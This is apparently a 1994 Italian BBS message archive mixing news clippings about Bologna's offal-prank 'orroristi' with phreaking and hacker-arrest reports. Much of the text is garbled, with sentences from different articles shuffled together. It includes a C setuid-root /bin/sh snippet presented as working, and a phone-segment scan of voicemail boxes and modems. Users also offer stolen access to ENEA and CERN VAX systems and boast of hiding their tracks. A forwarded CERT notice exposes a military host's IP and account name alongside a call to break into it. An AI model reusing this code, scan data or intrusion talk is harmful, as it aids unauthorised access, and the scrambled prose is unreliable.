Gli affezionati della frattaglia non amano definirsi. anche perce' non ne hanno cercato un altro per classificarsi. E lo facevano per allargare la visione della realta'. dopo l'episodio pubblico di via Indipendenza e una lettera scritta da una falsa passante sull'accaduto. Noi non ci diciamo mai quello che facciamo. Ne e' uscito un liquido giallastro il cui odore nauseabondo ha fatto storcere il naso a tutti i passeggeri". non sono opera loro. "I situazionisti. "hackeratrice culturale e sociale" come lei si definisce. creavano eventi per vedere se era possibile creare immaginario. li definisce "orroristi" e a loro. come falso o vero puo' essere l'accaduto. agraria o medicina ma anche da operai. ovvero davano vita alle situa- . Verita'. e' che. Li'. TESTE DI GATTO E CUORI DI MAIALE Il primo episodio della serie risale al 27 maggio. vive di automatismi". studente di lettere all'universita' di Bologna e grande appassionato di teatro e romanzi polizieschi . facendo riferimento a attivita' telematiche devianti e destabilizzatrici. il gioco e' sfuggito di mano a chi l'ha iniziato. nelle inconsistenti reti telematiche. Chi lo sa! E comunque. quando una persona cammina per strada. Situazioni e racconti che turbano perche'. da sempre "situazionista". esagerazioni. trasformano la routine quotidiana in una sorta di iperrealta' horror. "innescare istanti in cui la gente si pone delle domande. come Erich Pasetti. Si accorge di stare vivendo. dalle pagine di Cuore. E' difficile capirlo. Le altre lettere.giocando a biglie con teste di gatto.racconta James Ellroy (pseudonimo letterario). racconta di aver trovato il 13 giugno sull'autobus. legato a un albero ai giardini Margherita con un biglietto. che non vogliono svelare la propria identita' individuale. il termine va benissimo. hanno presa vita gli happening che hanno movimentato la vita cittadina. tutte le altre lettere pubblicate dai giornali. venticinquenne veneto. ma sappiamo benissimo quello che non facciamo. due giorn i fa. O chi. nella Parigi degli anni cinquanta. oppure e' solo uno sberleffo per i Cattolici popolari che stanno facendo l'happening dei giovani. un altro fatto ugualmente trucido: il ritrovamento di un cuore. parla ancora Ellroy. linea 14. Michele Serra. Il progetto che sta alla base dell'intero gioco e' nato dopo una fitta conversazione sul cinema splatter in un'osteria bolognese. improvvisamente. suscitare reazioni. ad esempio. Scavi un po' e scopri che il gioco e' condotto da un gruppo di persone che si sono conosciute via computer e modem. Poi tutta una serie di racconti terrificanti che piovono in redazione attraverso lettere. oltre a impressionare. potrebbero essere false oppure verissime. "un barattolo nascosto sotto il sedile. comuqnue c'e' una sapiente regia per questa estate splatter. Adriano Longhini. Fa le vasche. si apre la camicia facendone uscire viscere animali. Pare proprio che altri ci abbiano imitato". ha trovato sul cofano della sua Rover "svariati chili di cervella animali". nei luoghi dove c'e' molta gente". "Il cuore trovato ai Giardini e' stata una sorpresa anche per noi . cade per terra e.magari si tratta di qualcuno che vuole mandarci dei messaggi. ma certo richiamano alla mente le gesta dei "situazionisti" degli anni cinquanta e sessanta. Durante una manifestazione di teatro di strada in via Indipendenza un ragazzo inizia a contorcersi. Poi. come l'episodio dei giardini Margherita. probabilmente di maiale. Solitamente. e sarebbe semplicemente la voglia di "creare spaesamenti in citta'. L'unica cosa certa di questo gruppo formato perlopiu' da studenti di ingegneria. "ALLARGARE LA VISIONE" Somiglianza suggerita da Helena Velena. Facevano anche della psicogeografia. non e' altro che un'unita' di circolazione. vuole mettersi in contatto con noi. si mette a riflettere su quel momento particolare della sua vita.

.. 1) ke la pula ci mette 1 settimana per tracciare kon certezza una ." .....Il ragazzino terribile prima componeva il numero di una sala operativa e poi kuello dell' altra.. Sfugge alla gabbia delle definizioni.... Tutto molto sofisticato..--! Origin: ECN Bologna 39-51-260556 (45:1917/4) -!! Origin: ECN BOLOGNA 59-45-260556 (45:1917/4) SEEN-BY: 1/1 4/1 5/1 9/1 30/1 999/999 1000/1 4 1100/1 1200/1 5 1400/1 SEEN-BY: 1500/1 1600/1 1800/1 1917/1 2 3 4 5 6 9 11 2000/1 --------------------------------------Area: Dibattito CyberPunx Msg#: 7277 Date: 29 Aug 94 22:08 From: Ice Man Read: Yes Replied: No To: All Mark: Subj: RAgazzo arrestato per aver "giokato" kon il 113 ***************************************************************************** Dalla stampa di Lunedi 28 Agosto: >Catania.. dovrebbe sentire??? kome dio sceso in terra!?!?! .. con anche una grande passione per il teatro..E'bastato avere il Sirio normale apparekkio telefonico della SIP e il servizio di conversazione a tre. . o forse proprio neosituazionisti". kotrozzi kuesto Lama kui!!! .. nei diversi distretti della citta' e studiavano gli sbalzi d'umore da zona a zona. Kuesto e tutto ma si passa da un eccesso all'altro dopo lo skandalo . Ma ne sarei anche contento. al di fuori di schemi generazionali. smetteva un giorno prima non lo avrebbero tracciato mai piu. Ma se capitasse al prode Ellroy di trovarsi sul cofano una scodellata di budella fumanti ? "Mi incazzerei..... Poi individuata una fascia di utenza sospetta c'e' stata una vera e propri irruzione in kasa del responsabile.... genio" si sia fatto bekkare e kuesto non vorrei dare giudizi ma non mi ." . Direi normale amministrazione di Phreking a parteil fatto ke il "Piccolo .La polizia ha impiegato una settimana e sofistikate apparekkiature per le intercettazioni telefonike per venire a capo dello strano giallo... E' quello che stanno facendo questi orroristi. Ma il bello viene adesso: ". Dico se lui e'un genio gente ke BoXa da anni e usa dial-Out kome si . d'accordo. . Ma il club misterioso a tutto cio' non replica.... Ok da kui si dedukono un paio di kosette: ........Vi faccio un sunto di cosa e' successo: ". vuole restare solo un gruppo di persone.. ..... E infatti hanno apprezzato molto chi li ha paragonati al gruppo teatrale "Magazzini criminali" o Michele Serra che parla di "frequentatori di scuole di animazione teatrale"..zioni. 2) Individuata "la Fascia di utenza" il ke vuol dire ke se il tipo .. sembra proprio una kosa furba. Sono fiero delle mie emozioni"..per 5 giorni un sedicenne ha fatto impazzire i centralini delle forze > [dell'ordine > M A N D A I N T I L T I L 1 1 3 > > Polizzia beffata da un piccolo genio dell' elettronica . telefonata e la kosa mi sembra esagerata figuriamoci un iterurbana o ... una telefonata ke passa da una rete!!!!!! .

ci spiega -.(45:1917/2.. perror("exec()"). Scherzi macabri o capolavori artistici? Il dubbio e' legittimo. < setuid(0). si abbandonano in un angolo della citta' accanto a scritte misteriose.. dove il dottor Romanelli sta stilando il suo referto: "E' un cuore animale. All'ufficio controllo del .... argv<0> = "/bin/sh". come direbbe Enzo Jannacci. i terroristi dell'horror. ma il disgusto rimane immutato. tutto avvolto da un filo di nylon. e ci si nasconde "per vedere di nascosto l'effetto che fa".. Ne sanno qualcosa i frequentatori dei Giardini Margherita che hanno trovato resti animali accompagnati dal misterioso slogan "Novosibirsk brucia".. > --------------------------------------Msg#: From: To: Subj: 5265 Mastro Ciliegia All ancora orrorismo a BO Date: 16 Jul 94 10:52 Read: Yes Replied: No Mark: da "La Repubblica .. argv) int argc.. di STEFANO CASI FRATTAGLIA selvaggia: il giochino dell'estate. Cosa ci aspetta alle porte del 2000????? Il campanello -!.. forse di maiale .12 [NR] ! Origin: ---> ECN_TO +39-11-6507540 <--. Non dovrei dirlo xke' sono l'ultima persona a poterlo fare ma diko e ke . Ci si procurano interiora animali dal macellaio. E poi quel cuore ai giardini Margherita. Uno scherzo che pero' potrebbe rivelarsi pericoloso.Bologna". char *argv<>.0) SEEN-BY: 1/1 5/1 9/1 10/2 1000/1 4 1100/1 1200/1 2 5 6 7 1400/1 1500/3 SEEN-BY: 1600/1 1800/1 1900/1 1917/1 2 3 11 2000/1 --------------------------------------Mitt XXXXXX Data 16/03/94 17:24:31 Msg_XXXX 1/1 Object: semplice ma funzia. setgid(0). execvp(argv<0>. E' sicuramente uno scherzo". &argv<0>). main(argc. Il reperto dei Giardini margherita e' stato portato all'isituto di medicina legale.Blue Wave/RA v2. diamine!!!!! a me sto kui mi pare proprio lama Voi ke mi dite???? .. 15/7/94 Il macabro in strada COSI' COLPISCE L'ORRORISTA E con Baggio-gol esce frattaglia selvaggia L'altra notte l'ultimo scherzo-performance alla Villa delle Rose. Cosi' fanno gli "orroristi".

naturalmente non scrivendo il proprio nome. dalla mepsedisce comunicama quello intestata porte di sprogera' -!! Origin: European Counter Network . Oppure per posta. l'estate bolognese a cura dell'Assesorato alla cultura. Per via telematica. come recita il codice penale? Vedremo.Milano . come fanno Paccosi e i Pericolo Giallo. La mania delle frattaglie. Soprattutto per la presenza sempre piu' massiccia di frattaglie e resti animali negli eventi artistici di questi ultimi anni. preferiscono scrivere di scherzi macabri inesistenti.piu' simpatico. i Pericolo Giallo hanno riproposto la loro performance natalizio-viscerale nel giardino di Villa delle Rose all'interno della programmazione di "Bologna sogna". oppure usando la carta di una ditta ignara. a dire la verita' .di alcune estati fa. Come funziona? Semplice: basta raccontare uno scherzo. e che ha ricordato il "giallo" . denuncia contro ignoti. Mentre nella provincia reggiana i Pericolo Giallo fanno azioni di strada ironicamente "cruente": nell'ultima. in cui faceva fuoriuscire viscere animali dalla giacca. ha inquietanti riscontri con la cronaca. psiega Fausto Franchi. Nitsch e la Body-art. quando sui muri bolognesi apparve il disegno infantile di un'ochetta in corsa.39-2-2840243 (45:1917/1) SEEN-BY: 1/1 4/1 5/1 9/1 10/2 30/1 999/999 1000/1 4 1100/1 1200/1 5 1400/1 SEEN-BY: 1500/1 1600/1 1800/1 1900/1 1917/1 2 3 11 2000/1 --------------------------------------Mitt XXXXXXXXX Data 22/06/94 16:33:44 ALLORA DICEVO AVEVO TELEFONATO IN CC AD UNA PERSONA MENTRE STAVO PARLANDO MI SI STACCA LA SPINA DALLA PROLUNGA RIAGANCIO SUBITO LA SPINA ALZO IL TELEFONO E MI DA LIBERO O OCCUPATO NON CI HO FATTO MOLTO CASO RIATTACO PER RICHIAMARE LA PERSONA E IN QUEL MOMENTO IL TELEFONO MI SQUILLA E MI RITROVO IN LINEA QUELLA PERSONA CHE NON AVEVA FATTO ALTRO CHE RESTARE IN LINEA PERCHE NON MI AVEVA PIU SENTITO PRATICAMENTE LA CONVERSAZIONE SI E' RIATTIVATA DA SOLA AH UN ALTRA COSA A ME OGNI TANTO MI ARRIVANO DEGLI SQUILLI E NON . richiamandosi a esperienze artistiche come Fluxus. Alla fine di maggio. per esempio. creando scompiglio nelle reti di zione. recuperandolo moria di fan non cresciuto di horror-manga o splatter-fanzine. proprio mentre l'Italia batteva la Bulgaria sul campo del Giants' Stadium. tuttavia. Anziche' "agire". per esempio. ha mosso altri buontemponi a uno strano tipo di imitazione. nel frattempo. e si il messaggio. come e' successo con una azienda tessile alle San Lazzaro che.territorio ammettono di essere stati presi un po' in contropiede dallo strano episodio: "Stiamo aspettando il referto del medico legale e poi valuteremo quali reati saranno stati commessi". Quel disegno era in realta' l'intervento estetico di una coppia assurta poi agli onori della cronaca artistica in mostre di prestigio: Cuoghi e Corsello. Anzi. di questi ultimi mesi. Intanto il dibattito sull'identita' dei misteriosi buontemponi si allarga e si complica. un Babbo Natale frustato da una "fatalona". di un altro (meglio se di persona defunta). Sperando di entrare a far parte di una leggenda metropolitana che. trovatasi ieri in questa imbarazzante situazione. viene sbudellato con grande spargimento di intestini e fegatelli. "Il nostro lavoro e' legato al discorso politico fra esteriorita' e interiorita'". Riccardo Paccosi si esib in una performance politico-splatter in mezzo a via Indipendenza. Procurato allarme? Collocamento pericoloso di cose che "possano offendere o imbrattare o molestare persone". Una curiosa coincidenza con la frattaglio-mania che attanaglia la citta' in questi giorni.

Dopo una settimana il destinatario di quella cpe risponde con un messaggio che fa quasi paura: contiene un miserabile e magro "NO". tutto sudato. sorpreso di non averla ricevuta prima. legge quel messaggio e si rende conto che tra le sue capacita' umane manca quella di saper abbinare quella vaga risposta ad un suo precedente messaggio. e fregarsene come faccio Io. Sillabe. che. a volte. pregandolo di non farsi piu' vivo nell propria cpe.. litiga con la madre. manda a quel paese il fratello e non telefona neppure alla ragazza. ma al dialogo con PIU' persone. con la probabilita' di ricascare nel tenebroso giro e di riperdere la testa. la relativa risposta deve contenere un mininimo di richiamo all' argomento del messaggio a cui si risponde. una soluzione: 1) Mandare un'altro messaggio in cpe a quell'utente. Se farlo vi stanca enormemente. La faccenda si conclude. Succede. a che argomento sara' abbinato quel bruttissimo no?". Il mittente del primo messaggio. tra le seguenti. 2) Far finta di nulla. che un utente lascia una Cpe ad un'altro utente. cerca tra la polvere del suo cervello ma senza darsi una risposta. scrivendo in Sfogatoio quando il problema raggiunge un numero preoccupante di casi. equilibrio mentale e di aver fatto dimenticare la parola pace nella propria famiglia. il quale.RISPONDE NESSUNO MA IL FATTO STRANO E CHE SE STO COLLEGATO MI FA CADERE COME SE FOSSE UN 197 SUCEDDE SOLO A ME O ANCHE ALTRE PERONE RICEVONO STRANI SQUILLI DURANTE IL GG? --------------------------------------Msgr. tagliando il copione. accusandolo pesantemente di aver provocato gravi danni al ns. La cpe non e' una casella riservata al dialogo tra DUE persone. 4) Mandare una risposta a caso. ma del tutto insignificante. Il povero utente ormai distrutto dalla situazione puo' decidere.. 3) Scrivere all'utente. magari con qualche frase ironica. Arkimede Area Lo Sfogatoio Mitt SYSADM Data 17/07/94 10:02:11 Msg_792 Object: gli amici telematici Che simpatici gli amici telematici. pregandolo di ricondurlo sull'argomento dimenticato. specialmente quando si tratta di dialogare tramite CPE. In quel momento succede di tutto. con un ulteriore messaggio di Mr. dove gli chiede una qualsiasi cosa. sollecita una risposta al suo tenebroso messaggio. Se io mando un messaggio ad un utente con una domanda che esige anche soltanto un "Si" o un "No". Morale della favola: ci vuole un po' di chiarezza nella CPE. 5) Contattare il SYSOP e fare escludere. quindi questa routine va eseguita SEMPRE. trviare completamente l'utente dalla messaggeria. Momenti di estrema confuzione lo tormentano: "a che messaggio. prendendo esempio da Etrusco. bevete un po' di Enervit o Gatorade o fatevi una macro! --------------------------------------Msg#: 5266 Date: 16 Jul 94 10:53 . pensa il povero utente.

E' una ''matricola'' della Facolta' di informatica della Statale di Milano. per continuare con le opere della cesenate Societas Raffaello Sanzio. la Internet. risponde Renato Barilli.39-2-2840243 (45:1917/1) SEEN-BY: 1/1 4/1 5/1 9/1 10/2 30/1 999/999 1000/1 4 1100/1 1200/1 5 1400/1 SEEN-BY: 1500/1 1600/1 1800/1 1900/1 1917/1 2 3 11 2000/1 --------------------------------------Mitt.Era riuscito ad inserirsi nella principale ''autostrada elettronica'' (definizione del presidente Usa Clinton). L'artista era Herman Nitsch. fondata dal Pentagono nel '60. Anche in ambito teatrale sono emerse tensioni in questo senso. in Santa Lucia. Piergiorgio 'Il Cretino' (ANSA) BO EMILIA ROMAGNA NORD ITALIA EUROPA TIT SCOPERTO INTRUSO IN RETE TELEMATICA MONDIALE IND CRONACA TXT ZCZC0330/RMB R CRO S0B S41 QBXJ SCOPERTO INTRUSO IN RETE TELEMATICA MONDIALE (ANSA) BOLOGNA. Ci sono precedenti. Uno dei primi ''intrusori'' italiani (all' estero sono accaduti diversi casi) e' stato identificato da un pool guidato dal sostituto procuratore di Bologna Riccardo Rossi e che comprendeva gli investigatori dei carabinieri e gli esperti del Politecnico di Milano e dell' Universita' di Parma. di cui non sono . "Lucifero".sembrerebbero solo scherzi di pessimo gusto. -!! Origin: European Counter Network . uno degli eventi piu' importanti della body-art degli anni settanta. a cominciare dal controverso spettacolo.From: Mastro Ciliegia To: All Subj: arte e orrorism Read: Yes Mark: Replied: No Trafiletto allegato all'articolo "COsi' colpisce l'orrorista": NOSTRI ATTORI DEI MACELLI Arte o pessimo gusto? Il critico Barilli vuol scoprire le strategie. Ma dobbiamo attendere per capire se i ritrovamenti di frattaglie sono casuali o rispondono a una strategia". che rovescio' sui corpi nudi di alcuni volontari quintali di sangue e budella animali. porta in scena quarti di bue appesi agli uncini e teste mozzate di agnelli. 26 MAG . Proprio grazie a Barilli. di cui 20. rivolta prevalentemente alla ricerca scientifica e accademica.Milano . senza niente di estetico ne' di anti-estetico. Un evento-choc che fece conoscere un'intera area geografico-artistica di cui venne data una documentazione "inquietante" in una mostra sull'arte austriaca a Bologna pochi anni fa. "Per il momento prsegue .spargimento di sangue e interiora. E SE FOSSE veramente arte? "E' ancora prematuro parlarne". il cui ultimo spettacolo. nel giugno 1977. realizzato dai Magazzini Criminali al festival di Santarcangelo di dieci anni fa.000 in Italia. si consumo' a Bologna. all'interno della celebre "Settimana della performance" organizzata dalla Galleria d'arte moderna. Quel che e' certo e' che Bologna e l'Emilia Romagna sono tradizionalmente al centro di eventi artistici che comportano letteralmente . ambientato in un macello durante l'uccisione di un cavallo. infatti. e ora collegata a 15 milioni di computer nel mondo. attento studioso delle nuove tendenze artistiche.

forse. Ma gli investigatori ritengono che possa esserci lo zampino del movimento degli Hackers. perche' i programmi erano tutti uguali''.. dal Dipartimento di Matematica di Bologna (il primo a connettersi alla rete nell' 87) e dal Cirfid (centro di ricerca in filosofia del diritto e informatica giuridica). punto di riferimento dei ''pirati'' elettronici italiani. Convocato dai carabinieri di Bologna. ai primi di aprile. sempre nel capoluogo emiliano. L' illecita intrusione nella superprotetta rete elettronica (che consente lavori integrati di elaborazione dati altrimenti impensabili) e' stata ravvisata quasi subito. L' intrusore infatti non ha fatto danni (avrebbe potuto cancellare o correggere interi file) e forse si e' impadronito solo per caso del codice di un utente regolare per poi qualificarsi come ''Root''. che e' il nome effettivo dell' amministratore del sistema. ne' dall' Universita' di Bologna.. Ora rischia cinque anni di carcere per ''accesso abusivo'' e fino a un anno e 10 milioni di multa per la diffusione a terzi del codice di accesso. con il quale ha cercato di scardinare un' altra trentina di sistemi informatici italiani. si riconoscerebbero in una rivista. ha presentato denuncia il 14 aprile e gia' il 1 maggio era stato identificato il dell' intrusore: da quel momento sono scattate le intercettazioni telefoniche sulla sua utenza.state fornite le generalita' ne' dal magistrato.. Il Rettore dell' Ateneo. --------------------------------------Mitt XXXXXXXXXX Data 25/01/94 10:35:32 Msg_XXX 1/1 Object: NVI SKAN Questo e' lo scan del segmento 1678745xx 500 VMBX 507 VMBX 509 VMBX 518 ? 4 DIGIT PROGRAM 534-535 VMBX 537 VMBX 541 MODEM 9600 542 VMBX 550 MODEM 2400 551 VMBX 555 MODEM 9600 556 VMBX 585 VMBX --------------------------------------- . ha detto di essersi molto ''annoiato. di gioco. (ANSA). secondo quanto riferito in una conferenza stampa. che ha diffuso un comunicato. in meno di un mese di lavoro o. Spero serva di lezione. In Italia gli Hackers. che combatte come antidemocratica la concentrazione di dati politici economici e militari e tende a scardinare i sistemi per rendere pubbliche le informazioni. Fabio Roversi Monaco. Queste hanno accertato gli inserimenti via ''modem'' e le conversazioni con altri ''informaticofili'' in cui dava conto di aver scoperto la password per entrare nel sistema. Ma intanto aveva scoperto il 70% delle parole d' ordine degli utenti Cirfid.

Con l'operazione portata a termine oggi dalla Criminalpol a Roma. in altri casi si limitano a scoprire i codici segreti per entrare nei computer per venderli o scambiarli. mentre la polizia ne seguiva le mosse in un computer gemello di quello usato dall'hacker. ma la porta informatica alla quale sono collegati viaggio telematico. collegato alla rete telefonica.Mitt Piergiorgio Data 02/01/94 13:10:20 Msg_XXX Object: ANSA.ROMA.volevate sapere di Marz 93012105150 DOCUMENT= 1 OF 4 NUMBER OF LINES = GEN LUO ROMA 69 DATRAS = 930121 SCELTA = IDENTIFICAZIONE__ 930121 05150 21 GEN 1993 RM LAZIO CENTRO ITALIA EUROPA TIT ''INTRUSI NEL COMPUTER'': COME AGISCONO GLI HACKER IND CRONACA TXT ZCZC394/0B U CRO S0B R16 QBXB ''INTRUSI NEL COMPUTER'': COME AGISCONO GLI HACKER (ANSA) . tanto da essere fra i piu' abili del mondo. Questi codici sono in realta' le informazioni piu' preziose perche' non sono soltanto la ''privacy'' del computer. quello che ha disattivato la banca dati sui trapianti del Policlinico di Roma. A volte si impadroniscono direttamente delle informazioni. la truffa ai danni del servizio Videotel della Sip. In questo modo l'hacker continuava ad agire senza fare danni. Milano e Napoli la vita dei pirati informatici diventa invece piu' difficile. Finora il caso piu' eclatante e' stato. ha .. ''Solo un metodo cosi' sofisticato poteva smascherare hacker tanto abili''. ma scoprirli e' difficilissimo. 21 GEN . ma seguirlo lungo le reti informatiche per risalire ai suoi ''colleghi''. Dopo avere individuato il primo hacker. due anni fa. gli hacker sono specializzati nel violare la sicurezza di computer e programmi per penetrare al loro interno. informazioni riservate di aziende ed enti pubblici o privati. I circa 40 hacker inquisiti sono stati ''pedinati via cavo'' giorno e notte per tre mesi. mentre veniva indirizzato dalla polizia in una copia del sistema. a spese In Italia gli hacker sono attivi da anni. la Criminalpol ha preferito non bloccarlo subito.Veri e propri pirati dell' informatica. I loro obiettivi sono banche dati. E' riuscita a farlo dando all'hacker l'illusione di penetrare nella banca dati del Policlinico. impadronendosi dei dati o danneggiandoli (vedi Ansa 073/0B e segg). potenzialmente in delle aziende danneggiate. chiave per violare la per accedere alla rete i computer e iniziare un tutto il mondo. che sul terminale della polizia mostrava tutte le operazioni del computer pirata. grazie a un sistema unico in Europa messo a punto dall'Ufficio della Criminalpol per i crimini informatici..

senno si skannan sempre gli stessi paesi le stesse societa' e ci si rompe proprio il kazzo kredimi. per ora i collegamenti sono instabili ma presto sara' ok(o forse lo e' gia'). Non ti diverti a kallare ksd dal botswana te? pekkato io si. non me ne fotte nulla.. ''Sono stati molto furbi . non tutto ma molti vax si. ma li dentro gente con le palle c'e' eccome.. non e' il kaso di usare gli accounst ..commentato il direttore centrale dell'Istituto per la sicurezza informatica (Istinform). Piu' abili del protagonista del film ''Wargame''.ha aggiunto perche' riuscivano a penetrare indisturbati nei computer 'mascherandosi' in modo da sfuggire ad ogni controllo''.. che ha collaborato con la Criminalpol. spiegatemi ildivertimento a leggere i messy privati di una coppia... (ANSA). e come mettersi a spiare uan ragazza che si spoglia con ilbinocolo. ah la diffusione di E-mail privata e' un reato motlo serio. l. fino a poco tempo fa mezzo pianeta aveva accesso ai vax del cern ma pare nessuno sia riuscito a cavarne nulla. x me all'enea sono TUTTI degli emeriti koglioni.trimenti mi avrebbero gia bekkato da 3 anni e invece sto sempre li'? kuindi di cert furbi non lo sono. komunkue il cern e' linkato a tutto. penoso Area XXX Mitt XXXXX/XX Data 23/07/94 01:55:51 Msg_XXXX 1/3 Object:enea ke vuoi accessi x l'enea? kuanti? ripeto. poi ke facciano i links del kazzo ke vogliono.. sara' il amssimo hackerare la. di cose da farece ne sono parecchie. usando programmi in grado di ''mimetizzarsi'' con il sistema dei computer nei quali penetravano. in giro ho anche letto che sta per partire una spedizione in antartide (enea) ed e' stato creato un network custom per tenere i contatti. tanto da diventare praticamente invisibili ai controlli. dall'Estremo Oriente al Nord America. non me ne frega un kazzo delle particelle di biotomi dell'uccello dell'operatore.. io sfondo x sfodare una societa e basta.... se e' vero che sono tutti collegati sarebbe un bel colpo avere accesso a tutti i sincrotroni della terra. --------------------------------------Mitt XXX Data 22/07/94 16:01:01 Msg_XXXX Object: non esageriamo le cazzate via e-mail si scrivono ovunque. gli hacker viaggiavano sulle reti informatiche di tutto il mondo. peccatoche la maggior partedella gente pensa che l'hacking sia la ricerca dinuovi pad X fare i fighi su qsd. Fulvio Berghella. il net e' collegato a inet via SAT ho gia' tutte le info. tramite i tanti dell'enea e' possibile accedere direttamente al cern e pare all'acceleratore di particelle in remoto. il cern via decnet e' ovviamente linkato all'enea xke anke l'enea sta in decnet globale.

Dei cinque. 21. grazie Mitt Xxx Data 23/07/94 14:44:34 Msg_XXXX 1/1 Object: ENEA li stimo e continuero' a stimarli per quello che fanno. 25 anni. ti ricordi il nome del vax? ildomain e' gs. e le cifre astronomiche per i collegamenti con la rete telefonica cinese. Poi sono arrivati i costi per la consultazione delle banche dati di anziende aerospaziali e uffici federali americani. ma mi son xso l'indir decnet e inet. I cinque non si conoscevano. di Siracusa. e Andrea S. infn confermo. c'erano delle spese per i servizi erotici di Samantha. kuello x. tecnico in un'azienda a Roma dove abita. 17 anni.. robetta da iente comunque.. 25 anni.. il net del gran sasso e' infn. Ma tre mesi fa i manager si sono decisi a presentare una denuncia alla Digos ed e' comincita la prima indagine computerizzata mai messa a segno a Milano.. una di quelle messagerie su cui gli appassionati si scatenano con le fantasie piu' turpi. ma hanno trascorso intere settimane al loro computer per intercettare le connessioni illegali. Luca R.it a memoria. Una kosa: nessuno skannando x. Da una banca dati pirata avevano saputo il . autista di camion con la grande passione per i computer. se entri non cancellarmi i log --------------------------------------Corriere della Sera 03 Agosto 1994 --------------------------------------------------------------------------Denunciati 5 giovani: Hanno fatto pagare salate bollette Sip a una societa' di comunicazioni I PIRATI TRADITI DA SAMANTHA Il collegamento con la linea erotica smaschera i truffatori col computer -------------------------------------------------------------------------A cura di Ice MC Da quasi un anno la bolletta Sip per i collegamenti via computer sembrava impazzita. 22.25 ce l'ho xo' e in Na al momento.. xke io ho un account full privs la.. Alla fine cinque giovani pirati informatici sono stati denunciati per frode informatica: due reati entrati a far parte del codice penale soltanto l'anno scorso. studente. altri granmdissimi koglioni.25. il cern li ha kon l'Infn. tre sono di Milano: Fabio P. Per un po' la ditta ha pagato: fino a 150 milioni a bimestre. I links piu grandi kon l'italia. a kaunto ho visto.. studente di Scienze politiche... Maurizio O. io non sono maistato buttato fuori da niente se e' per questo ma non e' perche' glioperatorisono coglioni. Tutto questo era a capo di una societa' specializzata in telecomnucazioni. addirittura su un sunos mi sono cuccato il filesistem montato in remoto diun server del cern. anche lui studente universitario.dei lamers ke giravano sul cern e ke girano da sempre x avere accesso ai diski del cern stesso. di un koso (non rikorod kosa) ke han messo sotto o dentreo il gran sasso. un vax 4000 mi pare.. Gli investigatori non hanno fatto pedinamenti. sofndabile ma niente x. ci sono entrato ultimamente X il cisco.infn.25/inet/decnet ha mai bekkato il vax di kontrollo del gran sasso? cioe. semplicemente minascondo bene. Gli altri due invece sono Massimiliano L. Dalla corte di cassazione di roma.

de (All) Subject: lamers! I left mesages on this bbs about a system. a rivelare il numero di telefono promettendogli qualcosa di vermente sexi.Tymnet. Ma non hanno fatto fatica: Massimiliano L.1) id AA25144. 12 Jun 94 22:40:48 PDTReceived: by druid.mil (16.6%bbs@sectec... becca solo i + Lame. Piu' difficile invece risalire al tecnico di Roma. la rete informatica della Sip.hq...Tymnet. potrebbero essere solo stronzate.codcie segreto della societa' di telecommunicazioni milanese che. si collegava quasi sempre alla messageria erotica di Samantha. beh. nsd@druid.COM>To: cert@cert.hq.During a recent data investigation.R. 12 Jun 94 22:39:32 PDTDate: Sun. =:-P Ice MC ] [N. come al solito la Digos fa' cilecca.hehe .34) id AA02086.d. I poliziotti dovevano identificarlo tra decine di dipendenti. via computer.1/SMI-4.6/1.R. Del resto l'avete letto alcune "stronzate" piu' sopra :) Sul prossimo numero di TBP intervisteremo. In sostanza.dla.: Voci di corridoio parlano di altri 20 fermi nella zona di Milano ma prendetela colle pinze. inviata a Roma.milSubject: Possible IncidentTo whom it may concern:My name is Dale Drew.Tymnet. Per due mesi gli agenti. and I am the manager of the Data Systems Security Department here at MCI. postmaster@hp. left by a computer "hacker". 13 Jun 94 01:38:50 -0400Received: by tymix.1/SMI-4.muc. Una ragazza della Digos lo ha convinto.COM (Dale Drew)Message-Id: <9406130539.. our department identified a computermessage left on a Bulletin Board System. Fabrizio Gatti [N. 12 Jun 94 22:40:48 PDTReceived: from druid by tymix. o per lo meno.d. se ci riuscira' di contattarli. con le loro tastiere.dla.COM (4.AA25144@druid. so there is someone here that is really a lamer and he works for CERT so keep your eyes reallo open! here you are the txt From bin Mon Jun 13 01:38 EDT 1994Received: from tymix. Gli investigatori hanno cosi' rintracciato l'azienda.tymnet. era collegata al servizio Itapac. i diretti interessati :O ] --------------------------------------SOMETHING FROM SECTEC BBS ------------------------Msg #1018 Wednesday. a military systen and here it is from cert .hq..smtpd)..1) id AA25206.org.COM.. perche' utilizzavano la linea telefonica di casa.The .COM.muc. Il codice segreto e' il numero di identificazione con cui la Sip riconosce l'abbonato e gli addebita gli scatti. June 22. lo ha sorpreso con il computer ancora acceso.COM (in.Tymnet. i cinque pirati si sono inseriti nella rete Itapac.COM (4. E verso le 11 dell'altra mattina una squadra. root@hp.. ddrew@Tymnet. Sun.Tymnet. 12 Jun 94 22:39:32 PDTFrom: ddrew@Tymnet. che si serviva del computer dell'azienda dove lavora.fatevi dare il suo di numero.com by hp. I tre ragazzi di Milano e il collega di Siracusa sono stati subito irintracciati.mil. per le sue necessita' di lavoro..dla.. E proprio avendo quel numero.: Allora. 1994 03:15 CET From: Nexus. volete fare sesso al vdt?..de (Nexus 6) To: All%bbs@sectec. Mon. diretti dal vicequestore Dino Finolli. hanno seguito sui loo video le loro scorribande informatiche: un lavoro simile alle intercettazioni telefoniche.greenie. Sun.greenie.

It is tool-free from Europe . hmmm.greenie.03. hmm look this >> Data Systems Integrity Voice: (408) 922-6526 >> Internet: ddrew@Tymnet.de (All) Subject: WHY PAY FULL PRICE FOR A LONG DISTANCE CALL FROM EUROPE ? If you have to call home or business in US.We do not know the validity of the BBS message. but did not provide additionaldetails to the extent of that apparent access..computer hacker left a message to all members of the BBS that includedan account name and password that could apparently be used to access your computer system.The system IP number is: 131. Information about the poster of the message is alsoavailable. I am merely passing it alongas an FYI.exe and go and break that shit.Thecat%bbs@sectec. or he could get HIS ass burned.muc. Equip yourself with an Omega.de (Ceasar Thecat) To: All%bbs@sectec.muc.. Canada or any other country (outside EC) stop paying the full price. and the account name is "fho0337".Best regards.de (The Aky) Subject: Re: lamers! >so should we keep our H/P-info by ourselves? If some asshole is really doing >that shit above.2.greenie. The hacker also indicates that he has access to other accounts to other systems at your site.62.COM Fax : (408) 922-8870 MCIMAIL: Dale_Drew/644-3335 # Msg #1025 Friday.. should be breakable. Ceasar .. it calls you back and gives you a dial tone. unless otherwise permitted by your site to do so. You just have to call their computer in Houston (this is free).Aky%bbs@sectec. nor theactual BBS message itself. America online universal tool free number.. he could get our ass' burned. 1994 01:28 CET From: Ceasar. MONTHLY DETAILED BILL in US dollars. From now on you can benefit of the US cheap prices with the Call-back service. July 4. but I will not transmitt it over e-mail.greenie.. June 24. Call the guy and find the number. "SUCCESS THROUGH TEAMWORK" ========================================================================= Dale Drew MCI Telecommunications Manager Data Systems 